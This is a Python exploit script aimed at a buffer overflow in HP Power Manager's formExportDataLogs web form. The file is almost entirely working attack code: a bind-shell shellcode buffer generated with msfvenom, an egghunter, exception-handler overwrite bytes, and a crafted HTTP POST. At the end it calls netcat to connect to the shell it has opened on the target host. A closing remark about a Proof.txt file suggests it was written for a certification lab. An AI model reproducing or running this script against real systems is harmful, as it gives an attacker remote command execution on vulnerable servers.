#!/usr/bin/python
print """
##//#############################################################################################################
##							##							#
## Vulnerability: HP Power Manager 'formExportDataLogs' ##  FormExportDataLogs Buffer Overflow	 		#
## 							##  HP Power Manager				 	#
## Vulnerable Application: HP Power Manager	 	##  This is a part of the Metasploit Module, 		#
## Tested on Windows [Version 6.1.7600] 		##  exploit/windows/http/hp_power_manager_filename	#
##							##							#
## Author: Muhammad Haidari				##  Spawns a shell to same window			#
## Contact: ghmh@outlook.com				##							#
## Website: www.github.com/muhammd			##							#
##							##							#
##//#############################################################################################################
##
##
## TODO: adjust 
##
## Usage: python hpm_exploit.py <Remote IP Address>
"""
import urllib
import os
import sys
import struct
import time
from socket import *

try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()

PORT  = 80

#msfvenom -p windows/shell_bind_tcp LHOST=10.11.0.55 LPORT=1234  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python


egg="b33fb33f"
buf= egg
buf += "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\x8e\x4f\xb5\x94\x83\xee\xfc\xe2\xf4\x72\xa7"
buf += "\x37\x94\x8e\x4f\xd5\x1d\x6b\x7e\x75\xf0\x05\x1f\x85"
buf += "\x1f\xdc\x43\x3e\xc6\x9a\xc4\xc7\xbc\x81\xf8\xff\xb2"
buf += "\xbf\xb0\x19\xa8\xef\x33\xb7\xb8\xae\x8e\x7a\x99\x8f"
buf += "\x88\x57\x66\xdc\x18\x3e\xc6\x9e\xc4\xff\xa8\x05\x03"
buf += "\xa4\xec\x6d\x07\xb4\x45\xdf\xc4\xec\xb4\x8f\x9c\x3e"
buf += "\xdd\x96\xac\x8f\xdd\x05\x7b\x3e\x95\x58\x7e\x4a\x38"
buf += "\x4f\x80\xb8\x95\x49\x77\x55\xe1\x78\x4c\xc8\x6c\xb5"
buf += "\x32\x91\xe1\x6a\x17\x3e\xcc\xaa\x4e\x66\xf2\x05\x43"
buf += "\xfe\x1f\xd6\x53\xb4\x47\x05\x4b\x3e\x95\x5e\xc6\xf1"
buf += "\xb0\xaa\x14\xee\xf5\xd7\x15\xe4\x6b\x6e\x10\xea\xce"
buf += "\x05\x5d\x5e\x19\xd3\x27\x86\xa6\x8e\x4f\xdd\xe3\xfd"
buf += "\x7d\xea\xc0\xe6\x03\xc2\xb2\x89\xb0\x60\x2c\x1e\x4e"
buf += "\xb5\x94\xa7\x8b\xe1\xc4\xe6\x66\x35\xff\x8e\xb0\x60"
buf += "\xfe\x86\x16\xe5\x76\x73\x0f\xe5\xd4\xde\x27\x5f\x9b"
buf += "\x51\xaf\x4a\x41\x19\x27\xb7\x94\x8a\x9d\x3c\x72\xe4"
buf += "\x5f\xe3\xc3\xe6\x8d\x6e\xa3\xe9\xb0\x60\xc3\xe6\xf8"
buf += "\x5c\xac\x71\xb0\x60\xc3\xe6\x3b\x59\xaf\x6f\xb0\x60"
buf += "\xc3\x19\x27\xc0\xfa\xc3\x2e\x4a\x41\xe6\x2c\xd8\xf0"
buf += "\x8e\xc6\x56\xc3\xd9\x18\x84\x62\xe4\x5d\xec\xc2\x6c"
buf += "\xb2\xd3\x53\xca\x6b\x89\x95\x8f\xc2\xf1\xb0\x9e\x89"
buf += "\xb5\xd0\xda\x1f\xe3\xc2\xd8\x09\xe3\xda\xd8\x19\xe6"
buf += "\xc2\xe6\x36\x79\xab\x08\xb0\x60\x1d\x6e\x01\xe3\xd2"
buf += "\x71\x7f\xdd\x9c\x09\x52\xd5\x6b\x5b\xf4\x55\x89\xa4"
buf += "\x45\xdd\x32\x1b\xf2\x28\x6b\x5b\x73\xb3\xe8\x84\xcf"
buf += "\x4e\x74\xfb\x4a\x0e\xd3\x9d\x3d\xda\xfe\x8e\x1c\x4a"
buf += "\x41"


#tools/exploit/egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'

hunter =  ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

buffer = "\x41" * (721 -len(hunter))
buffer +="\x90"*30 + hunter
buffer +="\xeb\xc2\x90\x90"           #JMP SHORT 0xC2 
buffer += "\xd5\x74\x41" 	      #pop esi # pop ebx # ret 10 (DevManBE.exe)
 

content= "dataFormat=comma&exportto=file&fileName=%s" % urllib.quote_plus(buffer)
content+="&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"

payload =  "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % buf
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Payload Fired... She will be back in less than a min..."
s.send(payload)
print "[+] Give me 30 Sec!"
time.sleep(30)
os.system("nc -nv " + HOST +" 1234")
s.close()
print "[+] Did you get your Proof.txt file?!?"
#note if you didn't get a bindshell, you may have to bump it to a minute time.sleep(60).